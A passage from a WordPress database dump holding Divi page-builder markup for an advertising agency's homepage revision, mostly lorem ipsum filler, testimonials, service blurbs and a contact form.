It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 19:58:13','2020-08-07 19:58:13','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(576,1,'2020-08-07 19:59:19','2020-08-07 19:59:19','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" 